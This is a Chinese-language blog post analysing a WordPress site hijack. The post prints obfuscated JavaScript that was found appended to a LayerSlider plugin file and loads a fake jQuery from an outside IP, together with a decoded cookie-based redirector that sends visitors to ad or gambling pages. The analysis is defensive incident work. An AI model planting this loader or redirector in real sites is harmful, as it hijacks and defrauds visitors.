📝 moudicat2017 年 08 月 24 日更新于 2026-05-274 次阅读
2017 年 08 月 24 日
更新于 2026-05-27
4 次阅读WordPress劫持代码分析
💡 最近某网站主页打开异常缓慢,并且还有很大概率被劫持到莫名赌博网站,由此发现劫持代码。
上周,浏览公司某网站时发现打开十分困难,且该站是架设于国内,按道理不会有这样的加载速度,并且有很大几率会出现多次跳转,最后跳转到赌博或者杀毒软件的网站。
发现这种情况,第一感觉是wp被劫持了,于是在网站wordpress源文件中找些线索,发现并没有什么异样。后来通过chrome的network和console发现了一些端倪,在一个名为LayerSlider的插件中有js文件向document append一个外部script.
在编辑器中打开该js,发现文件末尾有一段不一样的操作。
乍一看,全是utf-8编码过后的字符串,但是在之后的代码中能看见有document,嫌疑十分巨大,我们把代码格式化一下。
var _0xaae8=[
"",
"\x6A\x6F\x69\x6E",
"\x72\x65\x76\x65\x72\x73\x65",
"\x73\x70\x6C\x69\x74",
"\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C",
"\x77\x72\x69\x74\x65"
];
document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))让我们转一下码
""
"join"
"reverse"
"split"
">tpircs/<>"sj.yreuqj/87.11.942.431//:ptth"=crs tprcs<"
"write"
document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]));
document.write('>tpircs/<>"sj.yreuqj/87.11.942.431//:ptth"=crs tprcs<'.split('').reverse().join(''));
'>tpircs/<>"sj.yreuqj/87.611.942.431//:ptth"=crs tpircs<'.split('').reverse().join('')
"<script src="http://134.249.116.78/jquery.js"></script>"可以发现这段代码向document写入了一个“jQuery文件” 这就很显而易见了。 打开这个地址
这就很厉害了,伪装了一下真正的jQuery,然而把页面翻到底部,就能看见它的真面目。
//cpm
var _0xfbe7 = [
"\x67\x65\x74\x54\x69\x6D\x65",
"\x73\x65\x74\x54\x69\x6D\x65",
"\x63\x6F\x6F\x6B\x69\x65",
"\x3D",
"\x3B\x65\x78\x70\x69\x72\x65\x73\x3D",
"\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67",
"\x3B\x20\x70\x61\x74\x68\x3D",
"",
"\x69\x6E\x64\x65\x78\x4F\x66",
"\x6C\x65\x6E\x67\x74\x68",
"\x73\x75\x62\x73\x74\x72\x69\x6E\x67",
"\x3B",
"\x63\x6F\x6F\x6B\x69\x65\x45\x6E\x61\x62\x6C\x65\x64",
"\x63\x73\x72\x66\x5F\x75\x69\x64\x73",
"\x72\x6F\x69\x5F\x74\x6D\x73",
"\x31",
"\x2F",
"\x68\x72\x65\x66",
"\x6C\x6F\x63\x61\x74\x69\x6F\x6E",
"\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x63\x70\x6D\x32\x30\x2E\x63\x6F\x6D\x2F\x77\x61\x74\x63\x68\x3F\x6B\x65\x79\x3D\x66\x65\x30\x61\x39\x33\x39\x37\x31\x65\x39\x39\x33\x66\x30\x35\x39\x64\x37\x61\x37\x38\x62\x66\x32\x66\x61\x35\x31\x31\x37\x61",
"\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x63\x70\x6D\x32\x30\x2E\x63\x6F\x6D\x2F\x77\x61\x74\x63\x68\x3F\x6B\x65\x79\x3D\x37\x38\x39\x61\x34\x31\x32\x39\x65\x37\x38\x63\x30\x30\x30\x30\x38\x61\x34\x37\x62\x33\x36\x65\x32\x33\x64\x36\x35\x65\x61\x37"
];
function _mn_(_0xdb82x2, _0xdb82x3, _0xdb82x4, _0xdb82x5) {
var _0xdb82x6 = new Date();
var _0xdb82x7 = new Date();
if (_0xdb82x4 === null || _0xdb82x4 === 0) {
_0xdb82x4 = 3
}
;
_0xdb82x7[_0xfbe7[1]](_0xdb82x6[_0xfbe7[0]]() + 3600000 * 24 * _0xdb82x4);
document[_0xfbe7[2]] = _0xdb82x2 + _0xfbe7[3] + escape(_0xdb82x3) + _0xfbe7[4] + _0xdb82x7[_0xfbe7[5]]() + ((_0xdb82x5) ? _0xfbe7[6] + _0xdb82x5 : _0xfbe7[7])
}
function _nm_(_0xdb82x9) {
var _0xdb82xa = document[_0xfbe7[2]][_0xfbe7[8]](_0xdb82x9 + _0xfbe7[3]);
var _0xdb82xb = _0xdb82xa + _0xdb82x9[_0xfbe7[9]] + 1;
if ((!_0xdb82xa) && (_0xdb82x9 != document[_0xfbe7[2]][_0xfbe7[10]](0, _0xdb82x9[_0xfbe7[9]]))) {
return null
}
;
if (_0xdb82xa == -1) {
return null
}
;
var _0xdb82xc = document[_0xfbe7[2]][_0xfbe7[8]](_0xfbe7[11], _0xdb82xb);
if (_0xdb82xc == -1) {
_0xdb82xc = document[_0xfbe7[2]][_0xfbe7[9]]
}
;
return unescape(document[_0xfbe7[2]][_0xfbe7[10]](_0xdb82xb, _0xdb82xc))
}
if (navigator[_0xfbe7[12]]) {
if (_nm_(_0xfbe7[13]) == 1) {
if (_nm_(_0xfbe7[14]) == 1) {
} else {
_mn_(_0xfbe7[14], _0xfbe7[15], _0xfbe7[15], _0xfbe7[16]);
window[_0xfbe7[18]][_0xfbe7[17]] = _0xfbe7[19]
}
} else {
_mn_(_0xfbe7[13], _0xfbe7[15], _0xfbe7[15], _0xfbe7[16]);
window[_0xfbe7[18]][_0xfbe7[17]] = _0xfbe7[20]
}
}//cpm
var _0xfbe7 = [
"getTime",
"setTime",
"cookie",
"=",
";expires=",
"toGMTString",
"; path=",
"",
"indexOf",
"length",
"substring",
";",
"cookieEnabled",
"csrf_uids",
"roi_tms",
"1",
"/",
"href",
"location",
"https://www.cpm20.com/watch?key=fe0a93971e993f059d7a78bf2fa5117a",
"https://www.cpm20.com/watch?key=789a4129e78c00008a47b36e23d65ea7"
];
function setCookie(name, value, day, path) {
var date1 = new Date();
var date2 = new Date();
if (day === null || day === 0) {
day = 3
}
date2.setTime(date1.getTime() + 3600000 * 24 * day);
document.cookie = name + '=' + escape(value) + ';expires=' + date2.toGMTString() + ((path) ? '; path=' + path : '');
}
function getCookie(name) {
var _0xdb82xa = document.cookie.indexOf(name + '=');
var _0xdb82xb = _0xdb82xa + name.length + 1;
if ((!_0xdb82xa) && (name != document.cookie.substring(0, name.length))) {
return null
}
if (_0xdb82xa == -1) {
return null
}
var _0xdb82xc = document.cookie.indexOf(';', _0xdb82xb);
if (_0xdb82xc == -1) {
_0xdb82xc = document.cookie.length;
}
return unescape(document.cookie.substring(_0xdb82xb, _0xdb82xc))
}
if (navigator.cookieEnabled) {
if (getCookie('csrf_uids') == 1) {
if (getCookie('roi_tms') == 1) {
} else {
setCookie('roi_tms', '1', '1', '/');
window.location.href = 'https://www.cpm20.com/watch?key=fe0a93971e993f059d7a78bf2fa5117a';
}
} else {
setCookie('csrf_uids', '1', '1', '/');
window.location.href = 'https://www.cpm20.com/watch?key=789a4129e78c00008a47b36e23d65ea7';
}
}可以看到该段代码使用了cookie来记录访问者以导向不同页面。
来源分析
一番google之后,发现这个注入的代码应该是源自php批处理。
由于只在插件中找到了这样的注入代码,猜测是由于插件管理员在更新中误上传被注入的代码所致。
捡到了漂流瓶!
根据《非经营性互联网信息服务备案管理办法》,小岛暂不开放公开留言 / 评论。
想和我聊聊的话,欢迎通过其他渠道找我~